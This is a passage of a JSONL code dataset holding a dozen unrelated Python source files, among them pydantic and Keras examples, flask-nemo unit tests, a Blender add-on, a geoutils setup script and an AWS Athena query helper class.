f:\r\n        json.dump(settings,f,indent = 3)\r\n    \r\n    await ctx.send(':white_check_mark: Command has been set')\r\n\r\nTOKEN = 'YOUR TOKEN HERE'\r\nbot.run(TOKEN)","repo_name":"karansharma002/Discord","sub_path":"DISCORD PING/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41988265074","text":"from pydantic import BaseModel\n\n\nclass FooBarModel(BaseModel):\n    a: str\n    b: dict\n\n    class Config:\n        allow_mutation = False\n\n\nfoobar = FooBarModel(a='hello', b={'apple': 'pear'})\n\ntry:\n    foobar.a = 'different'\nexcept TypeError as e:\n    print(e)\n\nprint(foobar.a)\nprint(foobar.b)\nfoobar.b['apple'] = 'grape'\nprint(foobar.b)\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/acceptance/subjects/pydantic/docs/examples/models_mutation.py","file_name":"models_mutation.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40098771417","text":"fps = 60\n\nYCells = 5\nXCells = 9\n\nsun_drop_delay = 10\nstarting_sun = 50\n\ntime_paint_white = fps / 6\ntime_repeater_second_shot = fps / 6\ntime_readySetPlant = (fps * 4 / 3, fps * 2 / 3, fps / 12)\ntime_afterRSP = fps * 5 / 3\n\npassive_plants = [\"WallNut\", \"PotatoMine\",\n                  \"Chomper\", \"CherryBomb\",\n                  \"Jalapeno\", \"Squash\"]\n\nsizes = {\n    \"win\": (830, 623),\n    \"topmenu\": (500, 100),\n    \"cell\": (67, 72),\n    \"card\": (60, 82),\n    \"sun\": (60, 60),\n    \"projectile\": (20, 20),\n    \"zombie\": (72, 124),\n    \"plant\": (62, 62),\n    \"potatoExp\": (300, 200),\n    \"lawnmover\": (56, 48),\n    \"choose\": (475, 523),\n    \"letsRock\": (158, 40)\n}\n\npads = {\n    \"game\": (213, 170),\n    \"sun\": (85, 70),\n    \"menubar\": (100, 0),\n    \"choose\": (23, 141),\n    \"play\": (430, 65),\n    \"exit\": (748, 535),\n    \"cards\": 10,\n}\n","repo_name":"yeya24/PvZc","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8144178139","text":"\"\"\"\n\n    Test implementation of customization through init for example\n\n\"\"\"\n\nfrom tests.test_resources import NemoResource\nfrom flask_nemo import Nemo\nfrom MyCapytain.resources.collections.cts import XmlCtsTextMetadata\nfrom lxml import etree\nfrom tests.test_resources import NautilusDummy\n\n\nclass TestCustomizer(NemoResource):\n    \"\"\" Test customization appliers\n    \"\"\"\n    def 
test_chunker_default(self):\n \"\"\" Test that the chunker default is called and applied\n \"\"\"\n def default(text, reffs):\n self.assertEqual(str(text.urn), \"urn:cts:phi1294.phi002.perseus-lat2\")\n self.assertEqual(reffs, [\"1.pr\"])\n return [(\"1.pr\", \"I PR\")]\n\n nemo = Nemo(chunker={\n \"default\": default\n })\n chunked = nemo.chunk(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n [\"1.pr\"]\n )\n self.assertEqual(chunked, [(\"1.pr\", \"I PR\")])\n\n def test_chunker_urn(self):\n \"\"\" Test that the chunker by urn is called and applied\n \"\"\"\n def urn(text, reffs):\n self.assertEqual(str(text.urn), \"urn:cts:phi1294.phi002.perseus-lat2\")\n self.assertEqual(reffs, [\"1.pr\"])\n return [(\"1.pr\", \"I PR\")]\n\n nemo = Nemo(chunker={\n \"default\": lambda x, y: y,\n \"urn:cts:phi1294.phi002.perseus-lat2\": urn\n })\n chunked = nemo.chunk(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n [\"1.pr\"]\n )\n self.assertEqual(chunked, [(\"1.pr\", \"I PR\")])\n\n def test_transform_default_function(self):\n \"\"\" Test that the transform default is called and applied when it's a function\n \"\"\"\n urn_given = \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ref_given = \"1.pr.1\"\n\n def default(work, xml, objectId, subreference=None):\n self.assertEqual(str(work.urn), \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\")\n self.assertEqual(objectId, urn_given, \"Passage URN should be passed to transform\")\n self.assertEqual(subreference, ref_given, \"Passage URN should be passed to transform\")\n self.assertEqual(xml, \"\")\n return \"\"\n\n nemo = Nemo(transform={\n \"default\": default\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n \"\",\n urn_given,\n ref_given\n )\n self.assertEqual(transformed, \"\")\n\n def test_transform_default_none(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n nemo = Nemo()\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(\"\"),\n \"urn:cts:latinLit:phi1294.phi002.perseus-lat2:1.pr.1\"\n )\n self.assertEqual(transformed, \"\")\n\n def test_transform_urn_xslt(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n\n nemo = Nemo(transform={\n \"default\": \"tests/test_data/xsl_test.xml\"\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(''),\n objectId=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\",\n subreference=\"1.pr.1\"\n )\n self.assertEqual(transformed, '',\n \"It should autoclose the tag\"\n )\n\n def test_transform_match(self):\n \"\"\" Test that the transform default is called and applied\n \"\"\"\n\n nemo = Nemo(transform={\n \"default\": lambda x: self.assertEqual(False, True, \"This should not be run\"),\n \"urn:cts:latinLit:phi1294.phi002.perseus-lat2\": \"tests/test_data/xsl_test.xml\"\n })\n transformed = nemo.transform(\n XmlCtsTextMetadata(\n urn=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\"\n ),\n etree.fromstring(''),\n objectId=\"urn:cts:latinLit:phi1294.phi002.perseus-lat2\",\n subreference=\"1.pr.1\"\n )\n self.assertEqual(transformed, '',\n \"It should autoclose the tag\"\n 
)\n","repo_name":"Capitains/flask-capitains-nemo","sub_path":"tests/test_customization.py","file_name":"test_customization.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25264976281","text":"#how to use : python convertJson.py ../data/filename.json ../upload/filename.json\nimport codecs, json, sys\n\ndata = []\n\nread_file = sys.argv[1]\noutput_file = sys.argv[2]\noutput_file = output_file.split('.json')[0] + \"_\"\n\nwith codecs.open(read_file, 'rU', 'utf-8') as f:\n\tindex = 1\n\tcount = 1\n\tfile_name = output_file + str(index) + \".json\"\n\tprint(file_name)\n\n\tfor line in f:\n\t\tstrr = json.loads(line)\n\t\tstrr = str(strr)\n\t\tdata.append(strr)\n\t\tsp = strr.split(',')\n\t\t\n\t\tetc = \"\"\n\t\tfor i in range(len(sp)):\n\t\t\tsp[i] = str(sp[i])\n\t\t\tif \"LAT\" in sp[i]:\n\t\t\t\tLAT = sp[i].split(':')[1]\n\t\t\telif \"LNG\" in sp[i]:\n\t\t\t\tLNG = sp[i].split(':')[1]\n\t\t\telse:\n\t\t\t\tetc = etc + sp[i]\n\t\t\t\tif i != len(sp) -1:\n\t\t\t\t\tetc = etc + \", \"\n\t\tif LAT != \"\" and LNG != \"\":\n\t\t\tlocation = \"{ location : [\" + LNG + \", \" + LAT+\"],\" + etc\n#\t\t\tlocation = \"{ location : { type: 'Point', coordinates:[\" + LNG + \", \" + LAT+\"]},\" + etc\n\t\t\tlocation = location.replace(\"'\", \"\\\"\")\n\t\t\n\t\twith open(file_name, 'a+') as file:\n\t\t\tfile.write(location+'\\n')\n\t\tif count % 10000 == 0:\n\t\t\tprint(\">\" + str(10000*index) + \" imported !\")\n\t\t\t\n\t\tif count % 50000 == 0:\n\t\t\tindex = index +1\n\t\t\tfile_name = output_file + str(index) + \".json\"\n\t\t\tprint(file_name)\n\t\tcount = count + 1\n","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI(BaseLine)/public/python/convertJson.py","file_name":"convertJson.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2185394984","text":"import sys, copy\r\ninput = sys.stdin.readline\r\n\r\ndef onoff(idx):\r\n    if idx == 0:\r\n        for i in range(2):\r\n            tmp[i] = 1 - tmp[i]\r\n    \r\n    elif idx == n-1:\r\n        for i in range(n-2, n):\r\n            tmp[i] = 1 - tmp[i]\r\n    else:\r\n        for i in range(idx-1, idx+2):\r\n            tmp[i] = 1 - tmp[i]\r\n    return\r\n\r\nn = int(input())\r\nnow = list(map(int, input().strip()))\r\ntmp = copy.deepcopy(now)\r\nbulb = list(map(int, input().strip()))\r\nans = int(1e9)\r\ncnt = 0\r\n\r\n# Start without pressing the first bulb\r\nfor i in range(1, n):\r\n    if tmp[i-1] != bulb[i-1]:\r\n        cnt += 1\r\n        onoff(i)\r\n\r\nif tmp == bulb:\r\n    ans = min(ans, cnt)\r\n\r\ncnt = 1\r\ntmp = copy.deepcopy(now)\r\nonoff(0)\r\n# Start after pressing the first bulb\r\nfor i in range(1, n):\r\n    if tmp[i-1] != bulb[i-1]:\r\n        cnt += 1\r\n        onoff(i)\r\n\r\nif tmp == bulb:\r\n    ans = min(ans, cnt)\r\n\r\nif ans == int(1e9):\r\n    print(-1)\r\nelse:\r\n    print(ans)","repo_name":"rloldl-c/algorithm","sub_path":"백준/Gold/2138. 
전구와 스위치/전구와 스위치.py","file_name":"전구와 스위치.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11026607225","text":"import sys\nimport sqlite3\n\ndb_path = sys.argv[1]\n\nconn = sqlite3.connect(db_path)\ncurs = conn.cursor()\n\ncurs.executescript(\n\"\"\"\nCREATE TEMPORARY TABLE meta_bak(\nres_id INTEGER NOT NULL,\npath TEXT NOT NULL,\nRA REAL,\nDEC REAL,\nFOREIGN KEY (res_id) REFERENCES RESULTS(res_id) ON DELETE CASCADE ON UPDATE CASCADE);\n\n\nINSERT INTO meta_bak SELECT res_id, path, RA, DEC FROM metadata;\n\nDROP TABLE METADATA;\n\nCREATE TABLE METADATA(\nres_id INTEGER NOT NULL,\npath TEXT NOT NULL,\nRA REAL,\nDEC REAL,\nFOREIGN KEY (res_id) REFERENCES RESULTS(res_id) ON DELETE CASCADE ON UPDATE CASCADE);\n\nINSERT INTO METADATA SELECT res_id, path, RA, DEC FROM meta_bak;\nDROP TABLE meta_bak;\nVACUUM;\n\"\"\")\n\nconn.commit()\n\n\n\n\n","repo_name":"istraumit/Payne-Che","sub_path":"DBClean.py","file_name":"DBClean.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31109924012","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDeep Learning Summer Course - Exercise 4\n\n\"\"\"\n\nfrom tensorflow.keras.datasets import mnist\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import models\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\n\n\n# %%\n\n(train_data, train_labels), (test_data, test_labels) = mnist.load_data()\n\n# %%\n\ntrain_data = train_data.reshape((len(train_data), 28, 28, 1)) / 255\ntest_data = test_data.reshape((len(test_data), 28, 28, 1)) / 255\n\ntrain_labels = to_categorical(train_labels, num_classes=10)\ntest_labels = to_categorical(test_labels, num_classes=10)\n\n\n# %%\n\nsns.heatmap(train_data[1000, :, :].reshape((28,28)))\n\n# %%\n\nmodel = models.Sequential()\n\nmodel.add(layers.Conv2D(32, (5, 5), activation='relu', input_shape=(28, 28, 1), data_format='channels_last', name='first_layer',))\nmodel.add(layers.MaxPooling2D((2, 2)))\n# model.add(layers.Conv2D(64, (3, 3), activation='relu', data_format='channels_last'))\n# model.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', data_format='channels_last'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\n# %%\n\nmodel.compile(optimizer='adam',\n              loss='categorical_crossentropy',\n              metrics=['accuracy'])\n\n# %%\n\nhistory = model.fit(train_data, train_labels, epochs=2, validation_data=(test_data,test_labels))\n\n\n# %%\nkernels = model.get_layer(name='first_layer').get_weights()[0][:, :, 0, :]\nsns.heatmap(kernels[:, :, 1])\n\n# %%\n\nlayer_outputs= [layer.output for layer in model.layers]\nactivation_model= models.Model(inputs=model.input, outputs=layer_outputs)\nactivations = activation_model.predict(train_data[10].reshape(1,28,28,1))\n\ndef display_activation(activations, col_s, row_s, act_index):\n    activation = activations[act_index]\n    activation_index=0\n    fig, ax = plt.subplots(row_s, col_s, figsize=(row_s*2.5,col_s*1.5))\n\n    for row in range(0,row_s):\n        for col in range(0,col_s):\n            ax[row][col].imshow(activation[0, :, :, activation_index], cmap='gray')\n            activation_index+= 1\n    
","repo_name":"micheleberetta98/sdu-deep-learning-2021","sub_path":"day-6/Ex4.py","file_name":"Ex4.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22254868924","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(0, sys.path[0]+'/')\nimport bpy\nfrom bpy.props import PointerProperty, CollectionProperty\nfrom .nftGeneratorAddOn import AddOnPanel, MetadataProperties, AttributesProperties, Analyze, Generate\n\nbl_info = {\n \"name\": \"NFT random generator\",\n \"description\": \"Generate assets combinations\",\n \"author\": \"Doudou\",\n \"version\": (1, 0, 0),\n \"blender\": (3, 3, 1),\n \"category\": \"Scene\"\n}\n\naddOnClasses = AddOnPanel, MetadataProperties, AttributesProperties, Analyze, Generate\n\ndef register():\n\tfrom bpy.utils import register_class\n\tfor addOnClass in addOnClasses:\n\t\tregister_class(addOnClass)\n\tbpy.types.Scene.generatorSettings=PointerProperty(type=MetadataProperties)\n\tbpy.types.Scene.traitSettings=CollectionProperty(type=AttributesProperties)\n\ndef unregister():\n\tfrom bpy.utils import unregister_class\n\tfor addOnClass in reversed(addOnClasses):\n\t\tunregister_class(addOnClass)\n\tdel bpy.types.Scene.generatorSettings;\n\tdel bpy.types.Scene.traitSettings\n\nif __name__=='__main__':\n\tregister()\n","repo_name":"rizerkrof/blenderAddOn-nftGenerator","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3253747270","text":"from os import path\nfrom typing import Optional\n\nfrom setuptools import setup\n\nFULLVERSION = \"0.0.13\"\nVERSION = FULLVERSION\n\nwrite_version = True\n\n\ndef write_version_py(filename: Optional[str] = None) -> None:\n cnt = \"\"\"\\\nversion = '%s'\nshort_version = '%s'\n\"\"\"\n if filename is None:\n filename = path.join(path.dirname(__file__), \"geoutils\", \"version.py\")\n\n a = open(filename, \"w\")\n try:\n a.write(cnt % (FULLVERSION, VERSION))\n finally:\n a.close()\n\n\nif write_version:\n write_version_py()\n\n\nwith open(\"README.md\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"geoutils\",\n version=FULLVERSION,\n description=\"Analysis and handling of georeferenced rasters and vectors\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://www.github.com/GlacioHack/geoutils/\",\n author=\"The GlacioHack Team\",\n license=\"BSD-3\",\n packages=[\"geoutils\", \"geoutils.raster\"],\n python_requires=\">=3.8\",\n install_requires=[\n \"rasterio\",\n \"geopandas >= 0.12.0\",\n \"pyproj\",\n \"scipy\",\n \"typing-extensions; python_version < '3.8'\",\n \"matplotlib\",\n \"tqdm\",\n ],\n extras_require={\"rioxarray\": [\"rioxarray\"]},\n scripts=[\"bin/geoviewer.py\"],\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n","repo_name":"curtis18/geoutils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"39003876901","text":"import time, csv\n\nfrom cid.utils import get_parameter\nfrom io import StringIO\n\nfrom pkg_resources import resource_string\nfrom string import Template\nimport json\n\nimport logging\nlogger = 
logging.getLogger(__name__)\n\nclass Athena():\n    # Define defaults\n    defaults = {\n        'CatalogName': 'AwsDataCatalog',\n        'DatabaseName': 'customer_cur_data',\n        'WorkGroup': 'primary'\n    }\n    _CatalogName = None\n    _DatabaseName = None\n    _WorkGroup = None\n    ahq_queries = None\n    _metadata = dict()\n    _resources = dict()\n    _client = None\n    region: str = None\n\n    def __init__(self, session, resources: dict=None): \n        self.region = session.region_name\n        self._resources = resources\n        \n        # Athena client\n        self._client = session.client('athena', region_name=self.region)\n\n    @property\n    def client(self):\n        return self._client\n\n    @property\n    def CatalogName(self) -> str:\n        \"\"\" Check if AWS DataCatalog and Athena database exist \"\"\"\n        if not self._CatalogName:\n            # Get AWS Glue DataCatalogs\n            glue_data_catalogs = [d for d in self.list_data_catalogs() if d['Type'] == 'GLUE']\n            if not len(glue_data_catalogs):\n                self._status = 'AWS DataCatalog of type GLUE not found'\n            if len(glue_data_catalogs) == 1:\n                self._CatalogName = glue_data_catalogs.pop().get('CatalogName')\n            elif len(glue_data_catalogs) > 1:\n                # Select default catalog if present\n                default_catalog = [d for d in glue_data_catalogs if d['CatalogName'] == self.defaults.get('CatalogName')]\n                if not len(default_catalog):\n                    # Ask user\n\n                    self._CatalogName = get_parameter(\n                        param_name='glue-data-catalog',\n                        message=\"Select AWS DataCatalog to use\",\n                        choices=glue_data_catalogs\n                    )\n            logger.info(f'Using datacatalog: {self._CatalogName}')\n        return self._CatalogName\n\n    @CatalogName.setter\n    def CatalogName(self, catalog):\n        self._CatalogName = catalog\n\n    @property\n    def DatabaseName(self) -> str:\n        \"\"\" Check if Athena database exists \"\"\"\n\n        if not self._DatabaseName:\n            # Get AWS Athena databases\n            athena_databases = self.list_databases()\n            if not len(athena_databases):\n                self._status = 'AWS Athena databases not found'\n                print(self._status)\n                exit(1)\n            if len(athena_databases) == 1:\n                self._DatabaseName = athena_databases.pop().get('Name')\n            elif len(athena_databases) > 1:\n                # Remove empty databases from the list\n                for d in athena_databases:\n                    tables = self.list_table_metadata(DatabaseName=d.get('Name'))\n                    if not len(tables):\n                        athena_databases.remove(d)\n                # Select default database if present\n                default_database = [d for d in athena_databases if d['Name'] == self.defaults.get('DatabaseName')]\n                if len(default_database):\n                    self._DatabaseName = default_database.pop().get('Name')\n                else:\n                    # Ask user\n                    self._DatabaseName = get_parameter(\n                        param_name='athena-database',\n                        message=\"Select AWS Athena database to use\",\n                        choices=[d['Name'] for d in athena_databases],\n                    )\n            logger.info(f'Using Athena database: {self._DatabaseName}')\n        return self._DatabaseName\n\n    @DatabaseName.setter\n    def DatabaseName(self, database):\n        self._DatabaseName = database\n\n    @property\n    def WorkGroup(self) -> str:\n        \"\"\" Select AWS Athena workgroup \"\"\"\n        if not self._WorkGroup:\n            logger.info('Selecting Athena workgroup...')\n            workgroups = self.list_work_groups()\n            logger.info(f'Found {len(workgroups)} workgroups: {\", \".join([wg.get(\"Name\") for wg in workgroups])}')\n            if len(workgroups) == 1:\n                self._WorkGroup = workgroups.pop().get('Name')\n            elif len(workgroups) > 1:\n                # Select default workgroup if present\n                default_workgroup = next(iter([wg.get('Name') for wg in workgroups if wg['Name'] == self.defaults.get('WorkGroup')]), None)\n                if default_workgroup: logger.info(f'Found \"{default_workgroup}\" as a default workgroup')\n                # Ask user\n                self._WorkGroup = 
get_parameter(\n param_name='athena-workgroup',\n message=\"Select AWS Athena workgroup to use\",\n choices=[d['Name'] for d in workgroups],\n default=default_workgroup\n )\n logger.info(f'Selected workgroup: \"{self._WorkGroup}\"')\n return self._WorkGroup\n\n @WorkGroup.setter\n def WorkGroup(self, name: str):\n self._WorkGroup = name\n logger.info(f'Selected Athena WorkGroup: \"{self._WorkGroup}\"')\n\n def list_data_catalogs(self) -> list:\n return self.client.list_data_catalogs().get('DataCatalogsSummary')\n \n def list_databases(self) -> list:\n return self.client.list_databases(CatalogName=self.CatalogName).get('DatabaseList')\n \n def get_database(self, DatabaseName: str=None) -> bool:\n \"\"\" Check if AWS Datacalog and Athena database exist \"\"\"\n if not DatabaseName:\n DatabaseName=self.DatabaseName\n try:\n self.client.get_database(CatalogName=self.CatalogName, DatabaseName=DatabaseName).get('Database')\n return True\n except Exception as e:\n logger.debug(e, stack_info=True)\n return False\n\n def list_table_metadata(self, DatabaseName: str=None) -> dict:\n params = {\n 'CatalogName': self.CatalogName,\n 'DatabaseName': DatabaseName if DatabaseName else self.DatabaseName\n }\n table_metadata = list()\n try:\n paginator = self.client.get_paginator('list_table_metadata')\n response_iterator = paginator.paginate(**params)\n for page in response_iterator:\n table_metadata.extend(page.get('TableMetadataList'))\n logger.debug(f'Table metadata: {table_metadata}')\n logger.info(f'Found {len(table_metadata)} tables in {DatabaseName if DatabaseName else self.DatabaseName}')\n except Exception as e:\n logger.error(f'Failed to list tables in {DatabaseName if DatabaseName else self.DatabaseName}')\n logger.error(e)\n \n return table_metadata\n\n def list_work_groups(self) -> list:\n \"\"\" List AWS Athena workgroups \"\"\"\n result = self.client.list_work_groups()\n logger.debug(f'Workgroups: {result.get(\"WorkGroups\")}')\n return result.get('WorkGroups')\n\n def get_table_metadata(self, TableName: str) -> dict:\n table_metadata = self._metadata.get(TableName)\n params = {\n 'CatalogName': self.CatalogName,\n 'DatabaseName': self.DatabaseName,\n 'TableName': TableName\n }\n if not table_metadata:\n table_metadata = self.client.get_table_metadata(**params).get('TableMetadata')\n self._metadata.update({TableName: table_metadata})\n\n return table_metadata\n\n\n def execute_query(self, sql_query, sleep_duration=1, database: str=None, catalog: str=None, fail: bool=True) -> str:\n \"\"\" Executes an AWS Athena Query \"\"\"\n\n # Set execution context\n execution_context = {\n 'Database': database or self.DatabaseName,\n 'Catalog': catalog or self.CatalogName,\n }\n\n try:\n # Start Athena query\n response = self.client.start_query_execution(\n QueryString=sql_query, \n QueryExecutionContext=execution_context, \n WorkGroup=self.WorkGroup\n )\n\n # Get Query ID\n query_id = response.get('QueryExecutionId')\n\n # Get Query Status\n query_status = self.client.get_query_execution(QueryExecutionId=query_id)\n except self.client.exceptions.InvalidRequestException as e:\n logger.error(f'InvalidRequestException: {e}')\n exit(1)\n except Exception as e:\n logger.error('Athena query failed: {}'.format(e))\n logger.error('Full query: {}'.format(sql_query))\n exit(1)\n\n current_status = query_status['QueryExecution']['Status']['State']\n\n # Poll for the current status of query as long as its not finished\n while current_status in ['SUBMITTED', 'RUNNING', 'QUEUED']:\n response = 
self.client.get_query_execution(QueryExecutionId=query_id)\n current_status = response['QueryExecution']['Status']['State']\n\n # Sleep before polling again\n time.sleep(sleep_duration)\n\n # Return result, either positive or negative\n if (current_status == \"SUCCEEDED\"):\n return query_id\n elif not fail:\n return False\n else:\n failure_reason = response['QueryExecution']['Status']['StateChangeReason']\n logger.error('Athena query failed: {}'.format(failure_reason))\n logger.error(f'Failure reason: {failure_reason}')\n logger.info('Full query: {}'.format(sql_query))\n exit(1)\n\n def get_query_results(self, query_id):\n return self.client.get_query_results(QueryExecutionId=query_id)\n \n def get_query_execution(self, query_id):\n return self.client.get_query_execution(QueryExecutionId=query_id)\n\n def parse_response_as_list(self, response, include_header=False):\n data = list()\n\n # Get results rows, either with or without the header row\n rows = response['ResultSet']['Rows'] if include_header else response['ResultSet']['Rows'][1:]\n\n for row in rows:\n for r in row['Data']:\n data.append(r['VarCharValue'] if 'VarCharValue' in r else '')\n\n return data\n\n def query_results_to_csv(self, query_id, return_header=False):\n # Get query results\n response = self.client.get_query_results(QueryExecutionId=query_id)\n\n # Get results rows, either with or without the header row\n rows = response['ResultSet']['Rows'] if return_header else response['ResultSet']['Rows'][1:]\n\n if rows:\n # Write rows to StringIO in CSV format\n buf = StringIO()\n csv_writer = csv.writer(buf, delimiter=',')\n\n for row in rows:\n csv_writer.writerow([x['VarCharValue'] if 'VarCharValue' in x else None for x in row['Data']])\n\n # Strip whitespaces from CSVified string and return it\n return buf.getvalue().rstrip('\\n')\n else:\n return None\n\n def show_columns(self, table_name):\n sql_query = f'SHOW COLUMNS in {table_name}'\n query_id = self.execute_query(sql_query=sql_query)\n\n describe = self.query_results_to_csv(query_id).split('\\n')\n\n # Athena is weird.. 
Remove whitespaces.\n        result = [elem.rstrip() for elem in describe]\n\n        return result\n\n    def parse_selected_tables(self, month_list):\n        d = {}\n\n        for month in month_list:\n            split = month.split('_')\n\n            payer = split[1]\n            year = split[2][:4]\n            month = split[2][4:]\n\n            if payer in d:\n                d[payer].append((year, month))\n            else:\n                d[payer] = list()\n                d[payer].append((year, month))\n        \n        return d\n\n    # AHQ functions\n    def execute_ahq(self, query_id, **kwargs) -> list:\n        \"\"\" Execute Athena Query by name \"\"\"\n        # Load query\n        query = self.get_ahq(query_id, **kwargs)\n        # Execute query\n        execution_id = self.execute_query(query)\n        results = self.get_query_results(execution_id)\n        # Return results as list\n        return self.parse_response_as_list(results)\n\n\n    def get_ahq(self, query_id, **kwargs) -> str:\n        \"\"\" Returns a fully compiled AHQ \"\"\"\n        # Query path\n        query_file = self.get_ahqs().get(query_id).get('File')\n\n        template = Template(resource_string(__name__, f'../queries/{query_file}').decode('utf-8'))\n\n        # Fill in TPLs\n        columns_tpl = dict()\n        columns_tpl.update(**kwargs)\n        compiled_query = template.safe_substitute(columns_tpl)\n\n        return compiled_query\n\n\n    def get_ahqs(self) -> dict:\n        \"\"\" Return a list of all available AHQs \"\"\"\n        \n        if not self.ahq_queries: \n            # Load queries\n            queries_files = resource_string(__name__, '../queries/ahq-queries.json')\n            self.ahq_queries = json.loads(queries_files).get('query_templates')\n\n        return self.ahq_queries\n\n\n    def discover_views(self, views: dict={}) -> None:\n        for view_name in views:\n            try:\n                self.get_table_metadata(TableName=view_name)\n            except self.client.exceptions.MetadataException:\n                pass\n\n\n    def wait_for_view(self, view_name: str, poll_interval=1, timeout=60) -> bool:\n        deadline = time.time() + timeout\n        while time.time() <= deadline:\n            self.discover_views([view_name])\n            if view_name in self._metadata.keys():\n                logger.info(f'view {view_name} exists')\n                return True\n            else:\n                time.sleep(poll_interval)\n        else:\n            logger.info(f'view {view_name} does not exist')\n            return False\n\n\n    def delete_table(self, name: str, catalog: str=None, database: str=None):\n        if get_parameter(\n            param_name=f'confirm-{name}',\n            message=f'Delete Athena table {name}?',\n            choices=['yes', 'no'],\n            default='no') != 'yes':\n            return False\n\n        try:\n            res = self.execute_query(\n                f'DROP TABLE IF EXISTS {name};',\n                catalog=catalog,\n                database=database,\n                fail=False\n            )\n        except Exception as exc:\n            logger.debug(exc, stack_info=True)\n            logger.info(f'Table {name} cannot be deleted: {exc}')\n            return False\n        else:\n            if name in self._metadata: del self._metadata[name]\n            logger.info(f'Table {name} deleted')\n            return True\n\n    def delete_view(self, name: str, catalog: str=None, database: str=None):\n        if get_parameter(\n            param_name=f'confirm-{name}',\n            message=f'Delete Athena view {name}?',\n            choices=['yes', 'no'],\n            default='no') != 'yes':\n            return False\n\n        try:\n            res = self.execute_query(\n                f'DROP VIEW IF EXISTS {name};',\n                catalog=catalog,\n                database=database,\n                fail=False\n            )\n        except Exception as exc:\n            logger.debug(exc, stack_info=True)\n            logger.info(f'View {name} cannot be deleted: {exc}')\n            return False\n        else:\n            if name in self._metadata: del self._metadata[name]\n            logger.info(f'View {name} deleted')\n            return True\n","repo_name":"grinco/aws-cudos-framework-deployment","sub_path":"cid/helpers/athena.py","file_name":"athena.py","file_ext":"py","file_size_in_byte":15412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} 
+{"seq_id":"374847504","text":"alpha=0.1\nbeta=0.1\nfile=open(\"data/MED.REL\",\"r\")\ngt=file.readlines()\ndic={}\nfor i in gt:\n    query=int(i.split(\" \")[0])\n    doc=int(i.split(\" \")[2])\n    if query not in dic.keys():\n        dic[query]=[doc]\n    else:\n        dic[query].append(doc)\n    \nprint (dic)\n    \n","repo_name":"Shashwat777/Assignment-3","sub_path":"src/Problem_2/me.py","file_name":"me.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23403265004","text":"import logging\nimport sys\nimport tempfile\nimport shutil\n\nfrom functools import reduce\nfrom collections import deque\nfrom cheriplot.core import (\n    MultiprocessCallbackParser, BaseTraceTaskDriver, ConfigurableComponent,\n    Option, NestedConfig, interactive_tool, option_range_validator,\n    any_int_validator)\nfrom cheriplot.vmmap import VMMapFileParser\nfrom cheriplot.provenance import CheriCap\nfrom cheriplot.dbg.symbols import SymReader\n\nlogger = logging.getLogger(__name__)\n\nclass TraceDumpParser(MultiprocessCallbackParser, ConfigurableComponent):\n    \"\"\"Parser that performs filtering and search operations on a trace\"\"\"\n\n    range_format_help = \"Accept a range in the form <start>-<end>, <start>-, \"\\\n                        \"-<end> or <value>\"\n\n    info = 